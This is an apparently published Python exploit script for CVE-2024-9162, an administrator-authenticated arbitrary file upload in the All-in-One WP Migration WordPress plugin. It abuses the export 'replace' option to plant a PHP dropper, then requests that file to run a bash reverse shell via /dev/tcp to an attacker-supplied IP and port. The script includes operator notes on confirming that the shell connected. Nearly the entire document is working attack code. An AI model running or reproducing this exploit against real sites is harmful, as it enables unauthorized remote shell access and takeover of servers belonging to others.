# Exploit Title: All-in-One WP Migration and Backup <= 7.86 - Authenticated (Administrator+) Arbitrary File Upload
# Date: 09/29/2024
# Exploit Author: Ryan Kozak https://ryankozak.com
# Vendor Homepage: https://servmask.com/
# Version: <= 7.86
# Tested on: 7.86
# CVE : CVE-2024-9162
import base64
import requests
import argparse
import urllib.parse
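def main():
    """Upload a PHP reverse-shell stub via the ai1wm export "replace" option and trigger it.

    Flow (CVE-2024-9162, All-in-One WP Migration and Backup <= 7.86):

    1. Three ``ai1wm_export`` POSTs (priority 30, 50, 60) go to
       ``wp-admin/admin-ajax.php`` with ``options[replace]`` mapping ``*`` to a
       PHP stub, and ``storage``/``archive`` naming where the result is written.
    2. The written file is then fetched from
       ``wp-content/plugins/all-in-one-wp-migration/storage/<storage>/<file>``,
       which runs the stub and connects back to ``attacker_ip:attacker_port``.

    Operator notes:

    * This is an *authenticated* issue: ``secret_key`` is the plugin's
      ``ai1wm_secret_key``, which only an administrator can obtain. Without it
      the requests below do nothing useful.
    * The stub is left on disk under the plugin's storage directory; remove
      ``<storage>/<file>`` on the target when the engagement is over.
    * TLS verification is OFF by default (matches the original ``verify=False``)
      so self-signed targets work; pass ``--verify-tls`` to enforce it.
    * The trigger request only returns when the reverse shell exits, so a read
      timeout on that request is the expected "it worked" outcome, not an error.

    Exits with a non-zero status (``SystemExit``) when a request cannot be sent.
    """
    parser = argparse.ArgumentParser(
        description="CVE-2024-9162: All-in-One WP Migration and Backup <= 7.86 - Authenticated (Administrator+) Arbitrary File Upload"
    )
    parser.add_argument("victim_url", help="Target url or ip address.")
    parser.add_argument("secret_key", help="The ai1wm_secret_key for the victim site.")
    parser.add_argument("attacker_ip", help="The attacking IP address to catch the shell.")
    # type=int so a non-numeric port fails at parse time instead of yielding a broken /dev/tcp path.
    parser.add_argument("attacker_port", type=int, help="The attacking port listening for the shell.")
    parser.add_argument('-s', '--storage', nargs='?', default='CVE-2024-9162', const='CVE-2024-9162')
    parser.add_argument('-f', '--file', nargs='?', default='CVE-2024-9162.php', const='CVE-2024-9162.php')
    parser.add_argument("--timeout", type=float, default=15.0,
                        help="Per-request timeout in seconds (default: 15).")
    parser.add_argument("--verify-tls", action="store_true",
                        help="Verify the target's TLS certificate (disabled by default).")
    args = parser.parse_args()

    # Tolerate a trailing slash on the target; otherwise we would request "//wp-admin/...".
    base_url = args.victim_url.rstrip("/")
    php_stub = _build_php_stub(args.attacker_ip, args.attacker_port)
    ajax_url = f"{base_url}/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1"
    # Kept explicit (with charset) to send exactly what the original script sent.
    headers = {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'}

    session = requests.Session()
    session.verify = args.verify_tls

    # The three export steps differ only in "priority"; the plugin's export
    # pipeline is not visible here, so the sequence is kept exactly as in the
    # original (30, 50, 60) rather than reduced.
    for priority in (30, 50, 60):
        form = _export_form(php_stub, args.storage, args.file, args.secret_key, priority)
        try:
            resp = session.post(ajax_url, headers=headers, data=form, timeout=args.timeout)
        except requests.exceptions.RequestException as exc:
            raise SystemExit(f"[-] Export request (priority={priority}) could not be sent: {exc}")
        if resp.status_code >= 400:
            # Not fatal on its own: the trigger step below tells us whether the file landed.
            print(f"[!] Export request (priority={priority}) returned HTTP {resp.status_code}; "
                  f"check victim_url and secret_key. Body starts: {resp.content[:120]!r}")

    shell_url = (f"{base_url}/wp-content/plugins/all-in-one-wp-migration/storage/"
                 f"{urllib.parse.quote(args.storage)}/{urllib.parse.quote(args.file)}")
    print("Triggering the exploit, check your listener...")
    try:
        resp = session.get(shell_url, timeout=args.timeout)
    except requests.exceptions.ReadTimeout:
        # The stub blocks for as long as the reverse shell lives, so a read
        # timeout here means the PHP executed and is holding the connection.
        print("[+] Trigger request timed out waiting for a response - the stub is "
              "presumably holding the connection open; check your listener.")
        return
    except requests.exceptions.RequestException as exc:
        raise SystemExit(f"[-] Trigger request could not be sent: {exc}")
    if resp.status_code == 404:
        print("[-] Stub not found at the storage path; the export step probably did not write the file.")
    print(resp.content)


def _build_php_stub(attacker_ip, attacker_port):
    """Return the PHP dropper ``<?php eval(base64_decode(...)); ?>`` for a bash reverse shell.

    The inner command is base64-wrapped only to keep quoting simple inside the
    form field; it is not obfuscation of any strength.
    """
    # Reverse shell payload, edit if you'd like something else.
    command = (f"shell_exec('bash -c \"/bin/bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1 \""
               f" 2>/dev/null');")
    encoded = base64.b64encode(command.encode("utf-8")).decode("ascii")
    return f"<?php eval(base64_decode('{encoded}')); ?>"


def _export_form(php_stub, storage, archive, secret_key, priority):
    """Build one ``ai1wm_export`` form body as ordered ``(key, value)`` pairs.

    A list (not a dict) keeps the repeated ``[]`` keys, and letting ``requests``
    URL-encode the values means ``secret_key``/``storage``/``archive`` containing
    ``&`` or ``=`` can no longer corrupt the body, as they could when the
    original interpolated them into a pre-encoded string.
    """
    return [
        ("action", "ai1wm_export"),
        ("ai1wm_import", "1"),
        # Search/replace map: the second pair maps the wildcard "*" to the PHP
        # stub, which is what ends up in the written file.
        ("options[replace][old_value][]", ""),
        ("options[replace][old_value][]", "*"),
        ("options[replace][new_value][]", ""),
        ("options[replace][new_value][]", php_stub),
        # The original body had this key mangled ("%5e" where "%5B" was meant,
        # i.e. "options^ncrypt_password_confirmation]"); the priority-50 request
        # sent both fields well-formed and still worked, so an empty password is
        # presumably ignored by the plugin - confirm against the plugin source.
        ("options[encrypt_password]", ""),
        ("options[encrypt_password_confirmation]", ""),
        ("ai1wm_manual_export", "1"),
        ("storage", storage),
        ("file", "1"),
        ("secret_key", secret_key),
        ("priority", str(priority)),
        ("archive", archive),
    ]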
if __name__ == "__main__":
    # CLI entry point: parse arguments and run the exploit.
    main()